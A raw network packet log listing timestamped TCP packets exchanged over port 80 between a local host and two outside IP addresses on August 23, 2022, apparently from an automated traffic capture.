Aug 23, 2022 18:24:03.447798014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447802067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447805882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447825909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447854042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447879076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447895050 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447900057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447902918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447918892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447945118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447971106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447995901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448019028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448024035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448026896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448036909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448059082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448082924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448098898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448105097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448107958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448127031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448153019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448179960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448191881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448196888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448200941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448225975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448252916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448277950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448291063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448296070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448299885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448323011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448349953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448376894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448389053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448394060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448398113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448419094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448442936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448467970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448493004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448515892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448546886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448551893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448564053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448589087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448613882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448641062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448648930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448653936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448657990 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448683023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448707104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448731899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448755026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448761940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448774099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448798895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448824883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448848963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448873043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448879004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448882103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448889017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448915958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448940039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.448959112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448964119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448967934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.448981047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449006081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449031115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449043989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449048996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449053049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449070930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449096918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449120045 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449136972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449141979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449145079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449157953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449179888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449203968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449223042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449228048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449230909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449246883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449270010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449294090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449311018 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449316025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449318886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449336052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449358940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449381113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449407101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449414968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449419022 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449421883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449425936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449448109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449472904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449492931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449497938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449512959 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449523926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449551105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449578047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449611902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449616909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449639082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449661016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449682951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449707031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449729919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449740887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449744940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449748993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449769020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449791908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449812889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449835062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449858904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449883938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449889898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449892998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449901104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449925900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449949980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449975967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.449991941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.449996948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450001001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450018883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450040102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450054884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450078964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450103998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450118065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450122118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450125933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450145960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450169086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450192928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450207949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450213909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450218916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450241089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450270891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450299978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450310946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450315952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450320959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450346947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450373888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450398922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450413942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450419903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450424910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450444937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450474024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450504065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450516939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450520992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450525045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450597048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450623035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450651884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450680017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450709105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450736046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450757027 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450763941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450767994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450769901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450788975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450817108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450840950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450874090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450896978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450917959 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450927019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450941086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.450959921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.450979948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451001883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451009035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451013088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451016903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451035023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451056004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451070070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451073885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451090097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451109886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451131105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451143026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451148033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451150894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451169968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451193094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451208115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451229095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451240063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451265097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451296091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451318026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451335907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451379061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451390982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451395988 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451416969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451447010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451472998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451497078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451502085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451524019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451546907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451570988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451594114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451606035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451622009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451628923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451652050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451675892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451699018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451706886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451710939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451734066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451746941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451750994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451770067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451795101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451817989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451848984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451864958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451869965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451874971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451896906 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451926947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451951981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.451970100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451992035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.451997042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452016115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452044964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452075958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452096939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452105045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452135086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452171087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452195883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452223063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452239037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452270985 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452291012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452315092 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452342033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452370882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452394009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452399969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452431917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452455044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452476978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452498913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452521086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452541113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452545881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452549934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452563047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452589035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452613115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452631950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452636003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452639103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452661037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452685118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452709913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452729940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452749968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452754021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452758074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452778101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452801943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452825069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.452836037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452857971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.452904940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.453804970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.456204891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456242085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456268072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456295013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456319094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456345081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456371069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456393957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456410885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456420898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456425905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456429005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456451893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456479073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456496954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456501961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456521988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456549883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456573963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456600904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456614971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456619978 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456624031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456646919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456675053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456701040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456724882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456741095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456746101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456752062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456777096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.456785917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.456809998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.457057953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.536797047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.550554037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550621033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550645113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550666094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550705910 CEST	80	49827	45.95.11.158	192.168.2.3
